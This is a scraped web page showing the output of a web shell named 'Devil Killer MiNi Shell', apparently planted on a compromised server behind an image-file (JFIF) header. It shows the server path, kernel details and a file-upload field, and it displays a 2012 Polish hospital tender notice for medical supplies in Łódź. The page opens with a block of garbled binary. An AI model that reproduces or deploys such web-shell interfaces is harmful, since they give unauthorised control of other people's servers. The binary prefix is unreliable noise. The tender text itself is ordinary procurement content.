JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121228/273001-N-2012.html

<p class="kh_header"><b>Łódź: Sprawa nr 190/12. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego 
o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy sprzętu medycznego dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi.</b><br>
<b>Numer ogłoszenia: 273001 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawa nr 190/12. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego 
o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy sprzętu medycznego dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy sprzętu medycznego wyszczególnionego ilościowo i asortymentowo oraz opisanego w załączniku nr 1 i 1a do SIWZ.

Przedmiot zamówienia został podzielony na 7 pakietów.

Pakiet 1.	
        1	Aparaty OCŻ		szt.400    
	2	Igła iniekcyjna sterylna jednorazowego użytku od 0,5 do 0,9 		op.200    
	3	Igła iniekcyjna sterylna jednorazowego użytku od rozm 1,1 do 1,2		op.300    
	4	Igła motylek sterylna 0,5 do 0,8		szt.5 000    
	5	Igła tuberkulinowa 0,45x16mm lub 0,45x12mm		op.70    
	6	Igła typu Spinocan 0,5 do 1,3 różne długości długosć 88-90mm		szt.250    
	7	Strzykawka 100ml z dwoma łącznikami, podwójna skala		szt.1 500    
	8	Strzykawka 10ml dwuczęściowa skala rozszerzona o min 20%		op.1 700    
	9	Strzykawka 2 ml dwuczęściowa  skala rozszerzona o min 20%		op.850    
	10	Strzykawka 20ml dwuczęściowa  skala rozszerzona o min 20%		op.4 200    
	11	Strzykawka 50 Luer		szt.350    
	12	Strzykawka 50 ml cewnikowa z łacznikiem		szt.8 500    
	13	Strzykawka 5ml dwuczęściowa  skala rozszerzona o min 20%		op.1 700    
	14	Strzykawka bursztynowa 50-60 ml do pomp Luer Lock, podwójna skala  		szt.6 000    
	15	Strzykawka Insulinowa 1 ml, posiadająca czarną skalę		szt.4 200    
	16	Strzykawka Luer-Lock 50-60ml do pomp, podwójna skala 		szt.6 000    
	17	Strzykawka Tuberkulinowa 1 ml		op.90    

Pakiet 2.	
        1	Cewnik Couveilera od nr 8 do nr 24		szt.420    
	2	Cewnik do odsysania od nr 6 do nr. 20, dwa otwory naprzemianległe		szt.2 500    
	3	Cewnik do podawania tlenu przez nos, długosć drenu min 210cm (bez czesci donosowej)	szt.2 500    
	4	Cewnik Foley od nr 6 do 26 sterylizowany radiacyjnie, lateksowa zastawka, pakowany folia - folia	szt.5 000    
	5	Cewnik Foleya 100% silikon od rozm. 10 do 24		szt.25    
	6	Cewnik Foleya trójdrożny od 10 do 24, cewnik 		szt.25    
	7	Cewnik Nelaton Kobiecy, od nr 12 do nr 18		szt.50    
	8	Cewnik Nelaton od nr 6 do 26		szt.2 000    
	9	Cewnik Pezzera od nr 12 do 36 z dwoma otworami, lateksowy		szt.650    
	10	Cewnik Tieman - Foley do nr 8 do 24		szt.650    
	11	Cewnik Tieman od nr 6 do 26		szt.650    
	12	Dren do jamy otrzewnej od nr 28 do 40		szt.200    
	13	Dren do jamy otrzewnej, od 18 do 26		szt.200    
	14	Dren Kehra od nr 9 do 20, lateksowy		szt.30    
	15	Dren Tlenowy 210cm		szt.250    
	16	Kanka doodbytnicza od nr 16 do 30		szt.650    
	17	Zgłębnik żołądkowy od nr 30 do 38		szt.25    
	18	Zgłębnik żołądkowy od nr 8 do 28		szt.1 200  

Pakiet 3.	
        1	Butla redona (okrągła) 200ml bez drenu		szt.200    
	2	Butla płaska 400 ml		szt.100    
	3	Butla płaska Redon 200 ml		szt.3 500    
	4	Butla Redona (okrągła) 400 ml bez drenu		szt.200    
	5	Butla redona (okrągła) z drenem 400ml x CH12		szt.40    
	6	Butla Redona(okrągła) z drenem 200ml		szt.100    
	7	Dren balonowy		op.1    
	8	Dren do ssaka żeńsko-żeński Ch30/300-400cm/ 2 lejki		szt.700    
	9	Dren do ssaka żeń-żeński Ch24 210cm 2 lejki		szt.2 500    
	10	Dren do ssaka-męsko-żeński CH24/210 cm lejek + łącznik		szt.2 500    
	11	Zestaw do odsys. z pola operacyjnego typu YANKAUER z drenem o długości minimum 3,5m		szt.3 500    

Pakiet 4.	
        1	Cewnik do pępowiny 5/40-50		szt.20    
	2	Cewnik podwójny do odsysania F18, 28, 36/50 cm		szt.20    
	3	Dren Ulmera od nr 10 do 18		szt.2 200    
	4	Końcówka do odsysania mini yankauer - różne rozmiary		szt.200    
	5	Końcówka do odsysania OP FLEX SUPERFLOW lub równoważne - różne rozmiary szt.200    
	6	Końcówka do odsysania pola operacyjnego o parametrach OP.-FLEX/POOL X-RAY lub równoważne - różne rozmiary 	szt.30    
	7	Końcówka do odsysania typu YANKAUER z koszyczkiem i bez koszyczka różne rozmiary	szt. 500    
	8	Łącznik do drenów prosty - różne rozmiary		szt.600    
	9	Łącznik do drenów schodkowy - różne rozmiary		szt.350    
	10	Łącznik do drenów typ Y 9-9-9 mm		szt.350    
	11	Łącznik tlenowy DISS		szt.30    
	12	Maski do wysokiej koncentracji tlenu dla dorosłych		 szt 650    
	13	Worek do moczu z krótkim drenem 35 cm		szt.200    
	14	Worek do żółci		szt.50    
	15	Worek mikcyjny męski 1litr		szt.200    
	16	Worek wymienny Uno-Vac		szt.500    
	17	Zestaw do drenażu ran UNO-VAC		szt.700    
	18	Zestaw do drenażu ran z drenem 400 ml - typu Unoversal (szpila) od 12 do 18 szt.	350    

Pakiet 5.	
        1	Łącznik karbowany 15-16cm		szt.150    
	2	Rurka Guadel od nr 00 do nr  5		szt.3 500    
	3	Rurka intubacyjna nosowa od 5 do 9 pakowana w opakowanie jednostkowe posiadające punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki		szt.100    
	4	Rurka intubacyjna bez mankietu od nr 2 do 4,5, pakowane w opakowanie jednostkowe posiadajace punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki, końcówka rurki posiadająca pasek w kolorze czarnym umieszczony wzdłuż końcówki rurki (nie półpierścień)	szt.100    
	5	Rurka intubacyjna z mankietem od nr2,5 do 4,5 pakowana w opakowanie jednostkowe posiadające punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki	szt.200    
	6	Rurka intubacyjna z mankietem od nr 5 do 9 pakowana w opakowanie jednostkowe posiadające punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki	szt.4 200    
	7	Rurka tracheostomijna od nr 6 do 10, posiadająca dwie wstążki mocujące i nieprzezroczyste skrzydełka mocujące 		szt.150    

Pakiet 6.	
        1	Gąbka do mycia jamy ustnej, nienasączona		szt.8 000    
	2	Ostrze chirurgiczne sterylne jednorazowe od 10A do 24 numer i nazwa producenta wygrawerowane na ostrzu. Nr serii i data ważności na opakowaniu jednostkowym. Kształt ostrza na opakowaniu jednostkowym.		op.350    
	3	Pałeczki do wymazów sterylne		op.800    
	4	Pinceta jednorazowa sterylna		szt.5 000    
	5	Szczoteczki do chirurgicznego mycia rąk, suche, sterylne	szt.2 000    
	6	Szpatułki Laryngologiczne, sterylne		op.50    
	7	Woreczek do moczu dla dziewczynek i chłopców		szt.1 200    
	8	Worek do moczu sterylny jednodniowy 		szt.17 000    
	9	Wziernik ginekologiczny od rozm. XS do L 		szt.6 500    
	10	Zaciskacz pępowiny mikrobiologicznie czysty		szt.500    
	11	Zatyczka do cewników		szt.1 000    
	12	Zestaw do godzinowej zbiórki moczu		szt.20    
	13	Zestaw do lewatyw		szt.850    
	14	Zestaw do pobierania wydzieliny z dróg oddech.		szt.250    

Pakiet 7.	
        1	Filtr bez nawilżacza typu Iso-Gard		szt.7 000    
	2	Filtr oddechowy z wymiennikiem ciepła i wilgoci dla dzieci		szt.100    
	3	Filtr antybakteryjny z nawilżaczem		szt.2 500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004. prawo zamówień publicznych przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
1)	wprowadzenia wyrobu medycznego lub udoskonalonego spełniającego parametry wymagane w SIWZ, pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż wyrób objęty zamówieniem początkowym. Ewentualna zmiana wyrobu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie aneksu w którym dotychczasowy wyrób zostanie wykreślony i zastąpiony wyrobem zmodyfikowanym lub udoskonalonym,
2)	wycofania wyrobu medycznego z produkcji. Wykonawca ma obowiązek zapewnić dostarczenie wyrobu zamiennego o parametrach nie gorszych od produktu objętego umową pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż wyrób objęty zamówieniem początkowym. Ewentualna zmiana wyrobu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie  aneksu mocą którego nastąpi wykreślenie z umowy wyrobu wycofanego z produkcji i zastąpienie go wyrobem zamiennym,
3)	podwyższenia stawki podatku VAT przy czym zmianie ulega jedynie cena netto, cena brutto pozostaje bez zmian. Nowe stawki będą obowiązywać strony wraz z wejściem w życie przepisów je regulujących. Każdorazowa zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek Zamawiającego,
4)	obniżenia stawki podatku VAT przy czym zmianie ulega jedynie cena brutto, cena netto pozostaje bez zmian. Nowe stawki będą obowiązywać strony wraz z wejściem w życie przepisów je regulujących. Każdorazowa zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek Zamawiającego,
5)	zmiany polegającej na zamianie wykorzystanego asortymentu obejmującego powyższą umowę na asortyment nie wykorzystany z tej umowy z zastrzeżeniem, iż całkowita wartość brutto umowy nie może ulec zmianie, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności,
6)	zmiany przedmiotowej/ wyrób medyczny zamienny/ jeśli wystąpi przejściowy brak wyrobu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu  wyrobu zamiennego o parametrach nie gorszych od wyrobu objętego umową oraz przy zachowaniu ceny jednostkowej, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności,
7)	w przypadku niewyczerpania całości asortymentu określonego w Załączniku nr 1 w terminie na jaki umowa została zawarta, termin ten ulegnie przedłużeniu o kolejne 30 dni</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJEWÓDZKI  SZPITAL SPECJALISTYCZNY
 im. M. Kopernika w Łodzi
ul. Pabianicka 62
93-513  Łódź
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2013 godzina 10:00, miejsce: WOJEWÓDZKI  SZPITAL SPECJALISTYCZNY
 im. M. Kopernika w Łodzi
ul. Pabianicka 62
93-513  Łódź
Kancelaria Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Aparaty OCŻ		szt.400    
	2	Igła iniekcyjna sterylna jednorazowego użytku od 0,5 do 0,9 		op.200    
	3	Igła iniekcyjna sterylna jednorazowego użytku od rozm 1,1 do 1,2		op.300    
	4	Igła motylek sterylna 0,5 do 0,8		szt.5 000    
	5	Igła tuberkulinowa 0,45x16mm lub 0,45x12mm		op.70    
	6	Igła typu Spinocan 0,5 do 1,3 różne długości długosć 88-90mm		szt.250    
	7	Strzykawka 100ml z dwoma łącznikami, podwójna skala		szt.1 500    
	8	Strzykawka 10ml dwuczęściowa skala rozszerzona o min 20%		op.1 700    
	9	Strzykawka 2 ml dwuczęściowa  skala rozszerzona o min 20%		op.850    
	10	Strzykawka 20ml dwuczęściowa  skala rozszerzona o min 20%		op.4 200    
	11	Strzykawka 50 Luer		szt.350    
	12	Strzykawka 50 ml cewnikowa z łacznikiem		szt.8 500    
	13	Strzykawka 5ml dwuczęściowa  skala rozszerzona o min 20%		op.1 700    
	14	Strzykawka bursztynowa 50-60 ml do pomp Luer Lock, podwójna skala  	szt.6 000    
	15	Strzykawka Insulinowa 1 ml, posiadająca czarną skalę		szt.4 200    
	16	Strzykawka Luer-Lock 50-60ml do pomp, podwójna skala 		szt.6 000    
	17	Strzykawka Tuberkulinowa 1 ml		op.90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cewnik Couveilera od nr 8 do nr 24		szt.420    
	2	Cewnik do odsysania od nr 6 do nr. 20, dwa otwory naprzemianległe		szt.2 500    
	3	Cewnik do podawania tlenu przez nos, długosć drenu min 210cm (bez czesci donosowej)		szt.2 500    
	4	Cewnik Foley od nr 6 do 26 sterylizowany radiacyjnie, lateksowa zastawka, pakowany folia - folia		szt.5 000    
	5	Cewnik Foleya 100% silikon od rozm. 10 do 24		szt.25    
	6	Cewnik Foleya trójdrożny od 10 do 24, cewnik 		szt.25    
	7	Cewnik Nelaton Kobiecy, od nr 12 do nr 18		szt.50    
	8	Cewnik Nelaton od nr 6 do 26		szt.2 000    
	9	Cewnik Pezzera od nr 12 do 36 z dwoma otworami, lateksowy		szt.650    
	10	Cewnik Tieman - Foley do nr 8 do 24		szt.650    
	11	Cewnik Tieman od nr 6 do 26		szt.650    
	12	Dren do jamy otrzewnej od nr 28 do 40		szt.200    
	13	Dren do jamy otrzewnej, od 18 do 26		szt.200    
	14	Dren Kehra od nr 9 do 20, lateksowy		szt.30    
	15	Dren Tlenowy 210cm		szt.250    
	16	Kanka doodbytnicza od nr 16 do 30		szt.650    
	17	Zgłębnik żołądkowy od nr 30 do 38		szt.25    
	18	Zgłębnik żołądkowy od nr 8 do 28		szt.1 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Butla redona (okrągła) 200ml bez drenu		szt.200    
	2	Butla płaska 400 ml		szt.100    
	3	Butla płaska Redon 200 ml		szt.3 500    
	4	Butla Redona (okrągła) 400 ml bez drenu		szt.200    
	5	Butla redona (okrągła) z drenem 400ml x CH12		szt.40    
	6	Butla Redona(okrągła) z drenem 200ml		szt.100    
	7	Dren balonowy		op.1    
	8	Dren do ssaka żeńsko-żeński Ch30/300-400cm/ 2 lejki		szt.700    
	9	Dren do ssaka żeń-żeński Ch24 210cm 2 lejki		szt.2 500    
	10	Dren do ssaka-męsko-żeński CH24/210 cm lejek + łącznik	szt.2 500    
	11	Zestaw do odsys. z pola operacyjnego typu YANKAUER z drenem o długości minimum 3,5m		szt.3 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
